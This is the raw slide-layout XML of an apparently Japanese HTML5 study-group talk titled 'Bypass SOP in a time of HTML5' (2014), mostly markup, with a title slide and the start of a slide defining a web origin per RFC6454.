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64"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="325" r:id="rId2"/>
    <p:sldId id="327" r:id="rId3"/>
    <p:sldId id="789" r:id="rId4"/>
    <p:sldId id="708" r:id="rId5"/>
    <p:sldId id="707" r:id="rId6"/>
    <p:sldId id="732" r:id="rId7"/>
    <p:sldId id="791" r:id="rId8"/>
    <p:sldId id="733" r:id="rId9"/>
    <p:sldId id="735" r:id="rId10"/>
    <p:sldId id="734" r:id="rId11"/>
    <p:sldId id="736" r:id="rId12"/>
    <p:sldId id="737" r:id="rId13"/>
    <p:sldId id="738" r:id="rId14"/>
    <p:sldId id="739" r:id="rId15"/>
    <p:sldId id="740" r:id="rId16"/>
    <p:sldId id="741" r:id="rId17"/>
    <p:sldId id="742" r:id="rId18"/>
    <p:sldId id="743" r:id="rId19"/>
    <p:sldId id="745" r:id="rId20"/>
    <p:sldId id="744" r:id="rId21"/>
    <p:sldId id="757" r:id="rId22"/>
    <p:sldId id="747" r:id="rId23"/>
    <p:sldId id="748" r:id="rId24"/>
    <p:sldId id="758" r:id="rId25"/>
    <p:sldId id="750" r:id="rId26"/>
    <p:sldId id="751" r:id="rId27"/>
    <p:sldId id="752" r:id="rId28"/>
    <p:sldId id="759" r:id="rId29"/>
    <p:sldId id="753" r:id="rId30"/>
    <p:sldId id="754" r:id="rId31"/>
    <p:sldId id="765" r:id="rId32"/>
    <p:sldId id="760" r:id="rId33"/>
    <p:sldId id="756" r:id="rId34"/>
    <p:sldId id="763" r:id="rId35"/>
    <p:sldId id="762" r:id="rId36"/>
    <p:sldId id="755" r:id="rId37"/>
    <p:sldId id="766" r:id="rId38"/>
    <p:sldId id="767" r:id="rId39"/>
    <p:sldId id="768" r:id="rId40"/>
    <p:sldId id="775" r:id="rId41"/>
    <p:sldId id="781" r:id="rId42"/>
    <p:sldId id="782" r:id="rId43"/>
    <p:sldId id="769" r:id="rId44"/>
    <p:sldId id="776" r:id="rId45"/>
    <p:sldId id="780" r:id="rId46"/>
    <p:sldId id="770" r:id="rId47"/>
    <p:sldId id="777" r:id="rId48"/>
    <p:sldId id="783" r:id="rId49"/>
    <p:sldId id="784" r:id="rId50"/>
    <p:sldId id="785" r:id="rId51"/>
    <p:sldId id="771" r:id="rId52"/>
    <p:sldId id="778" r:id="rId53"/>
    <p:sldId id="772" r:id="rId54"/>
    <p:sldId id="774" r:id="rId55"/>
    <p:sldId id="786" r:id="rId56"/>
    <p:sldId id="773" r:id="rId57"/>
    <p:sldId id="779" r:id="rId58"/>
    <p:sldId id="787" r:id="rId59"/>
    <p:sldId id="788" r:id="rId60"/>
    <p:sldId id="616" r:id="rId61"/>
    <p:sldId id="617" r:id="rId62"/>
    <p:sldId id="790" r:id="rId63"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Meiryo UI" panose="020B0604030504040204" pitchFamily="50" charset="-128"/>
      <p:regular r:id="rId65"/>
      <p:bold r:id="rId66"/>
      <p:italic r:id="rId67"/>
      <p:boldItalic r:id="rId68"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId69"/>
      <p:bold r:id="rId70"/>
      <p:italic r:id="rId71"/>
      <p:boldItalic r:id="rId72"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId73"/>
      <p:bold r:id="rId74"/>
      <p:italic r:id="rId75"/>
      <p:boldItalic r:id="rId76"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="メイリオ" panose="020B0604030504040204" pitchFamily="50" charset="-128"/>
      <p:regular r:id="rId77"/>
      <p:bold r:id="rId78"/>
      <p:italic r:id="rId79"/>
      <p:boldItalic r:id="rId80"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HGP創英ﾌﾟﾚｾﾞﾝｽEB" panose="02020800000000000000" pitchFamily="18" charset="-128"/>
      <p:regular r:id="rId81"/>
    </p:embeddedFont>
  </p:embeddedFont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0A8"/>
    <a:srgbClr val="006080"/>
    <a:srgbClr val="3333FF"/>
    <a:srgbClr val="0000FF"/>
    <a:srgbClr val="8EB4E3"/>
    <a:srgbClr val="66FFFF"/>
    <a:srgbClr val="292929"/>
    <a:srgbClr val="C93F19"/>
    <a:srgbClr val="E44D26"/>
    <a:srgbClr val="F2A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73" autoAdjust="0"/>
    <p:restoredTop sz="98749" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="134" d="100"/>
          <a:sy n="134" d="100"/>
        </p:scale>
        <p:origin x="6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font" Target="fonts/font4.fntdata"/><Relationship Id="rId84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10.fntdata"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font15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77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8.fntdata"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font16.fntdata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6.fntdata"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font11.fntdata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font" Target="fonts/font9.fntdata"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font14.fntdata"/><Relationship Id="rId8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font" Target="fonts/font7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DA404-DC88-4981-BBCB-E5F3E2BD583B}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2014/2/4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69C08-9716-4B2C-9A5C-3A0028494F6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0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C08-9716-4B2C-9A5C-3A0028494F62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6130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69C08-9716-4B2C-9A5C-3A0028494F62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5556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タイトル スライド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フリーフォーム 20"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1187624" y="1196752"/>
            <a:ext cx="7992888" cy="5661248"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 36512 w 7992888"/>
              <a:gd name="connsiteY0" fmla="*/ 5787148 h 6309320"/>
              <a:gd name="connsiteX1" fmla="*/ 36512 w 7992888"/>
              <a:gd name="connsiteY1" fmla="*/ 1 h 6309320"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 7992888"/>
              <a:gd name="connsiteY2" fmla="*/ 1 h 6309320"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 7992888"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6309320"/>
              <a:gd name="connsiteX4" fmla="*/ 7992888 w 7992888"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6309320"/>
              <a:gd name="connsiteX5" fmla="*/ 7303039 w 7992888"/>
              <a:gd name="connsiteY5" fmla="*/ 46431 h 6309320"/>
              <a:gd name="connsiteX6" fmla="*/ 185799 w 7992888"/>
              <a:gd name="connsiteY6" fmla="*/ 4798375 h 6309320"/>
              <a:gd name="connsiteX7" fmla="*/ 42288 w 7992888"/>
              <a:gd name="connsiteY7" fmla="*/ 6309320 h 6309320"/>
              <a:gd name="connsiteX8" fmla="*/ 36512 w 7992888"/>
              <a:gd name="connsiteY8" fmla="*/ 6309320 h 6309320"/>
              <a:gd name="connsiteX9" fmla="*/ 36512 w 7992888"/>
              <a:gd name="connsiteY9" fmla="*/ 6271064 h 63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92888" h="6309320">
                <a:moveTo>
                  <a:pt x="36512" y="5787148"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="36512" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7992888" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7303039" y="46431"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3730603" y="534512"/>
                  <a:pt x="916842" y="2413180"/>
                  <a:pt x="185799" y="4798375"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="42288" y="6309320"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="36512" y="6309320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36512" y="62710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0" name="フリーフォーム 19"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7020271" y="4296606"/>
            <a:ext cx="2130984" cy="2561391"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1194881"/>
              <a:gd name="connsiteY0" fmla="*/ 3475132 h 3475132"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 1194881"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 3475132"/>
              <a:gd name="connsiteX2" fmla="*/ 1194881 w 1194881"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 3475132"/>
              <a:gd name="connsiteX3" fmla="*/ 1089229 w 1194881"/>
              <a:gd name="connsiteY3" fmla="*/ 33713 h 3475132"/>
              <a:gd name="connsiteX4" fmla="*/ 55742 w 1194881"/>
              <a:gd name="connsiteY4" fmla="*/ 2853092 h 3475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881" h="3475132">
                <a:moveTo>
                  <a:pt x="0" y="3475132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1194881" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089229" y="33713"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="610490" y="343805"/>
                  <a:pt x="220712" y="1426941"/>
                  <a:pt x="55742" y="2853092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2" name="フリーフォーム 11"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="3923928" cy="2738809"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 409024"/>
              <a:gd name="connsiteY0" fmla="*/ 445533 h 466230"/>
              <a:gd name="connsiteX1" fmla="*/ 2164 w 409024"/>
              <a:gd name="connsiteY1" fmla="*/ 466230 h 466230"/>
              <a:gd name="connsiteX2" fmla="*/ 0 w 409024"/>
              <a:gd name="connsiteY2" fmla="*/ 466230 h 466230"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 409024"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 466230"/>
              <a:gd name="connsiteX4" fmla="*/ 409024 w 409024"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 466230"/>
              <a:gd name="connsiteX5" fmla="*/ 373722 w 409024"/>
              <a:gd name="connsiteY5" fmla="*/ 3431 h 466230"/>
              <a:gd name="connsiteX6" fmla="*/ 9508 w 409024"/>
              <a:gd name="connsiteY6" fmla="*/ 354578 h 466230"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 409024"/>
              <a:gd name="connsiteY7" fmla="*/ 445514 h 466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9024" h="466230">
                <a:moveTo>
                  <a:pt x="0" y="445533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2164" y="466230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="466230"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="409024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373722" y="3431"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="190908" y="39498"/>
                  <a:pt x="46918" y="178323"/>
                  <a:pt x="9508" y="354578"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="44551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>
          <a:xfrm>
            <a:off x="0" y="1484783"/>
            <a:ext cx="9144000" cy="3694545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1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1001">
            <a:schemeClr val="lt1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9748-2964-4679-A90C-05C4720C9069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2014/2/4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667-F53B-44A0-B4C7-CC53EAFBCD5B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1440160"/>
            <a:ext cx="9144000" cy="1886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1412776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20080" y="2060848"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr b="1"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483768" y="3717032"/>
            <a:ext cx="6400800" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buNone/>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128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14" name="正方形/長方形 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5085184"/>
            <a:ext cx="9144000" cy="188640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>
            <a:off x="0" y="5157192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19" name="フリーフォーム 18"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="2987824" cy="431017"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2987824"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 431017"/>
              <a:gd name="connsiteX1" fmla="*/ 2987824 w 2987824"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 431017"/>
              <a:gd name="connsiteX2" fmla="*/ 2683296 w 2987824"/>
              <a:gd name="connsiteY2" fmla="*/ 6687 h 431017"/>
              <a:gd name="connsiteX3" fmla="*/ 261552 w 2987824"/>
              <a:gd name="connsiteY3" fmla="*/ 342117 h 431017"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 2987824"/>
              <a:gd name="connsiteY4" fmla="*/ 431017 h 43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7824" h="431017">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2987824" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2683296" y="6687"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1697658" y="50623"/>
                  <a:pt x="842844" y="172795"/>
                  <a:pt x="261552" y="342117"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="431017"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="12700"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823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8892480" cy="692696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr b="1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399FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
              <a:defRPr b="1">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
              <a:defRPr b="1">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:buClr>
                <a:srgbClr val="00B050"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
              <a:defRPr b="1">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:defRPr>
            </a:lvl3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79748-2964-4679-A90C-05C4720C9069}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2014/2/4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A5667-F53B-44A0-B4C7-CC53EAFBCD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8" name="正方形/長方形 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6669360"/>
            <a:ext cx="9144000" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="292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764704"/>
            <a:ext cx="9144000" cy="144016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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6648096"/>
            <a:ext cx="31683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ja-JP" altLang="en-US" sz="1050" b="1" i="0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1050" b="1" i="0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44</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1050" b="1" i="0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kumimoji="1" lang="en-US" altLang="ja-JP" sz="1050" b="1" i="0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HTML5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1050" b="1" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC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とか勉強会</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1100" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC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0" y="6597352"/>
            <a:ext cx="9144000" cy="72008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/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8244408" y="6663119"/>
            <a:ext cx="216731" cy="216731"/>
            <a:chOff x="2339752" y="4730149"/>
            <a:chExt cx="648072" cy="648072"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="角丸四角形 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2425440" y="4831433"/>
              <a:ext cx="464458" cy="457201"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29625"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1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39752" y="4730149"/>
              <a:ext cx="648072" cy="648072"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="テキスト ボックス 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8379568" y="6608519"/>
            <a:ext cx="1251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ja-JP" sz="1400" b="0" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="66CCFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#html5j</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" b="0" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="66CCFF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2664296"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="5400" b="1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</a:defRPr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821397"/>
            <a:ext cx="9144000" cy="45719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79748-2964-4679-A90C-05C4720C9069}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2014/2/4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A5667-F53B-44A0-B4C7-CC53EAFBCD5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>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="899592" y="1700808"/>
            <a:ext cx="2016224" cy="3586201"/>
            <a:chOff x="1171428" y="-27562"/>
            <a:chExt cx="3540325" cy="6297080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3378" y="95852"/>
              <a:ext cx="2238375" cy="4876800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:scene3d>
              <a:camera prst="isometricRightUp">
                <a:rot lat="2100000" lon="18000000" rev="630000"/>
              </a:camera>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="平行四辺形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2643447" y="-27562"/>
              <a:ext cx="997528" cy="1241220"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 86111"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2AA96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平行四辺形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1287251" y="1210541"/>
              <a:ext cx="1497513" cy="1153293"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 117161"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2AA96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71428" y="1392718"/>
              <a:ext cx="2447925" cy="4876800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:scene3d>
              <a:camera prst="isometricRightUp">
                <a:rot lat="2100000" lon="18899998" rev="630000"/>
              </a:camera>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d>
              <a:bevelT w="0" h="6350"/>
            </a:sp3d>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="平行四辺形 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="4500000">
              <a:off x="73957" y="3958015"/>
              <a:ext cx="3492000" cy="148572"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C93F19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005020" y="2026274"/>
            <a:ext cx="5616624" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="6000" dirty="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:schemeClr val="bg1"/>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>Bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="6000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:schemeClr val="bg1"/>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>SOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:schemeClr val="bg1"/>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:schemeClr val="bg1"/>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:schemeClr val="bg1"/>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:schemeClr val="bg1"/>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>a time of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:glow rad="228600">
                    <a:schemeClr val="bg1"/>
                  </a:glow>
                </a:effectLst>
              </a:rPr>
              <a:t>HTML5</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="228600">
                  <a:schemeClr val="bg1"/>
                </a:glo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ts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1"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Jan 29 2014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1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Yosuke HASEGAWA</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" alt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6732240" y="4622242"/>
            <a:ext cx="432755" cy="432755"/>
            <a:chOff x="2339752" y="4730149"/>
            <a:chExt cx="648072" cy="648072"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="角丸四角形 13"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2425440" y="4831433"/>
              <a:ext cx="464458" cy="457201"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 29625"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700"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39752" y="4730149"/>
              <a:ext cx="648072" cy="648072"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="テキスト ボックス 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7055768" y="459333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400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#html5j</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" b="0" i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オリジンとは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オリジン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>とは</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>RFC6454</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0"/>
              <a:t>The Web Origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Concept</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>スキーム </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ホスト </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>ポート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デフォルトのポートは省略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正規化された表現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3648" y="3212976"/>
            <a:ext cx="7200800" cy="830997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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
